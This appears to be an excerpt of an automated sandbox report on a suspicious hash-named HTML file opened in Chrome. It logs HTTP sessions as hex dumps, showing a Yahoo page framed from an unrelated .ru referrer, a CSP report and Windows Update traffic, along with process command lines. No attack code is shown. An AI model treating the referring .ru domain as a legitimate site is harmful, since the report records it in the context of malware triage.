                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Referer: https://9zg.aforenotedc.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:09 UTC1288INHTTP/1.1 200 OK
                                                                                  expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                  referrer-policy: no-referrer-when-downgrade
                                                                                  strict-transport-security: max-age=31536000
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  set-cookie: yhome-viper=1; Domain=.www.yahoo.com; Path=/; Expires=Fri, 01 Nov 2024 15:50:09 GMT; HttpOnly; Secure
                                                                                  content-type: text/html; charset=utf-8
                                                                                  date: Wed, 02 Oct 2024 15:50:09 GMT
                                                                                  x-envoy-upstream-service-time: 63
                                                                                  server: ATS
                                                                                  Age: 2
                                                                                  Cache-Control: no-store, no-cache, max-age=0, private
                                                                                  Expires: -1
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: A1=d=AQABBLBr_WYCEJ3K8TVF0lRAN0y_xlN31iQFEgEBAQG9_mYHZ9xH0iMA_eMAAA&S=AQAAAhd2mo-O2ox1YJG25xFpnHs; Expires=Thu, 2 Oct 2025 21:50:09 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure; HttpOnly
                                                                                  Set-Cookie: A3=d=AQABBLBr_WYCEJ3K8TVF0lRAN0y_xlN31iQFEgEBAQG9_mYHZ9xH0iMA_eMAAA&S=AQAAAhd2mo-O2ox1YJG25xFpnHs; Expires=Thu, 2 Oct 2025 21:50:09 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                  Set-Cookie: A1S=d=AQABBLBr_WYCEJ3K8TVF0lRAN0y_xlN31iQFEgEBAQG9_mYHZ9xH0iMA_eMAAA&S=AQAAAhd2mo-O2ox1YJG25xFpnHs; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure
                                                                                  2024-10-02 15:50:09 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                  Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                  2024-10-02 15:50:09 UTC5INData Raw: 66 61 33 0d 0a
                                                                                  Data Ascii: fa3
                                                                                  2024-10-02 15:50:09 UTC1300INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 20 69 64 3d 61 74 6f 6d 69 63 20 63 6c 61 73 73 3d 22 6c 74 72 20 66 70 20 20 64 65 73 6b 74 6f 70 20 20 66 70 2d 6e 6f 6e 65 20 62 6b 74 72 6f 63 6b 65 74 5f 47 41 5f 64 65 73 6b 5f 74 65 73 74 2d 33 2d 76 31 2c 54 4e 42 45 30 30 33 2c 55 53 4e 45 4c 2d 52 65 61 63 74 49 6e 52 4d 50 2d 63 6f 6d 6d 65 72 63 65 2d 74 65 73 74 2d 31 30 30 31 2c 73 65 61 6d 6c 65 73 73 20 75 61 2d 63 68 72 6f 6d 65 20 75 61 2d 31 31 37 2e 30 20 69 73 4d 6f 64 65 72 6e 22 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 34 35 61 31 61 62 61 66 35 36 32 33 38 30 65 35 36 35 65 34 31 66 37 35 36 62 30 61 64 32 66 35 37
                                                                                  Data Ascii: <!doctype html><html data-color-scheme id=atomic class="ltr fp desktop fp-none bktrocket_GA_desk_test-3-v1,TNBE003,USNEL-ReactInRMP-commerce-test-1001,seamless ua-chrome ua-117.0 isModern" lang=en-US><head><script nonce=45a1abaf562380e565e41f756b0ad2f57
                                                                                  2024-10-02 15:50:09 UTC1300INData Raw: 65 6e 74 3d 22 79 61 68 6f 6f 2c 20 79 61 68 6f 6f 20 68 6f 6d 65 20 70 61 67 65 2c 20 79 61 68 6f 6f 20 68 6f 6d 65 70 61 67 65 2c 20 79 61 68 6f 6f 20 73 65 61 72 63 68 2c 20 79 61 68 6f 6f 20 6d 61 69 6c 2c 20 79 61 68 6f 6f 20 6d 65 73 73 65 6e 67 65 72 2c 20 79 61 68 6f 6f 20 67 61 6d 65 73 2c 20 6e 65 77 73 2c 20 66 69 6e 61 6e 63 65 2c 20 73 70 6f 72 74 2c 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 61 70 70 5f 69 64 20 63 6f 6e 74 65 6e 74 3d 22 34 35 38 35 38 34 32 38 38 32 35 37 32 34 31 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 69 6d 61 67 65 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 73 6f 63 69 61
                                                                                  Data Ascii: ent="yahoo, yahoo home page, yahoo homepage, yahoo search, yahoo mail, yahoo messenger, yahoo games, news, finance, sport, entertainment"><meta property=fb:app_id content="458584288257241"><meta property=og:image content="https://s.yimg.com/cv/apiv2/socia
                                                                                  2024-10-02 15:50:09 UTC689INData Raw: 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 72 7a 2f 6c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f
                                                                                  Data Ascii: el="shortcut icon" href="https://s.yimg.com/rz/l/favicon.ico"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//geo.query.yahoo.com"><link rel="preconnect" href="//geo.query.yaho
                                                                                  2024-10-02 15:50:09 UTC714INData Raw: 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 61 75 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 63 61 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6b 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 67 62 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 67 2e 79 61 68 6f 6f 2e 63 6f 6d 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 73 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74
                                                                                  Data Ascii: .com" hreflang="en-au"><link rel="alternate" href="https://ca.yahoo.com" hreflang="en-ca"><link rel="alternate" href="https://uk.yahoo.com" hreflang="en-gb"><link rel="alternate" href="https://sg.yahoo.com" hreflang="en-sg"><link rel="alternate" href="htt
                                                                                  2024-10-02 15:50:09 UTC2INData Raw: 0d 0a
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.449788188.125.72.1394433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:10 UTC644OUTPOST /beacon/csp?src=ats&site=news&region=US&lang=en-US&device=desktop&yrid=6o9nr8tivmg0j&partner= HTTP/1.1
                                                                                  Host: csp.yahoo.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 1003
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Content-Type: application/csp-report
                                                                                  Accept: */*
                                                                                  Origin: null
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: report
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:50:10 UTC1003OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65
                                                                                  Data Ascii: {"csp-report":{"document-uri":"https://www.yahoo.com/","referrer":"","violated-directive":"frame-ancestors","effective-directive":"frame-ancestors","original-policy":"frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadge
                                                                                  2024-10-02 15:50:10 UTC690INHTTP/1.1 204 No Content
                                                                                  expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                  referrer-policy: no-referrer-when-downgrade
                                                                                  strict-transport-security: max-age=31536000
                                                                                  x-content-type-options: nosniff
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 1; mode=block
                                                                                  x-powered-by: Express
                                                                                  etag: W/"a-bAsFyilMr4Ra1hIU5PyoyFRunpI"
                                                                                  content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_csp.yahoo.com
                                                                                  date: Wed, 02 Oct 2024 15:50:10 GMT
                                                                                  x-envoy-upstream-service-time: 1
                                                                                  server: ATS
                                                                                  Age: 0
                                                                                  Connection: close
                                                                                  Cache-Control: no-store, no-cache, private, max-age=0
                                                                                  Expires: -1


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.44978913.85.23.86443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:50:13 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6cpszyOxeMS9Ozg&MD=OVEsnKgD HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Accept: */*
                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                  Host: slscr.update.microsoft.com
                                                                                  2024-10-02 15:50:14 UTC560INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/octet-stream
                                                                                  Expires: -1
                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                  MS-CorrelationId: 06a23a3b-201c-4209-b8a8-21618e8d8740
                                                                                  MS-RequestId: 74fcea95-3213-4dfd-9de2-36fd23702013
                                                                                  MS-CV: IWbNEBSiQkq4Y0u/.0
                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Date: Wed, 02 Oct 2024 15:50:13 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 30005
                                                                                  2024-10-02 15:50:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                  2024-10-02 15:50:14 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:11:49:29
                                                                                  Start date:02/10/2024
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html"
                                                                                  Imagebase:0x7ff76e190000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:11:49:33
                                                                                  Start date:02/10/2024
                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2500,i,7935428339012205260,6274500483146043326,262144 /prefetch:8
                                                                                  Imagebase:0x7ff76e190000
                                                                                  File size:3'242'272 bytes
                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  No disassembly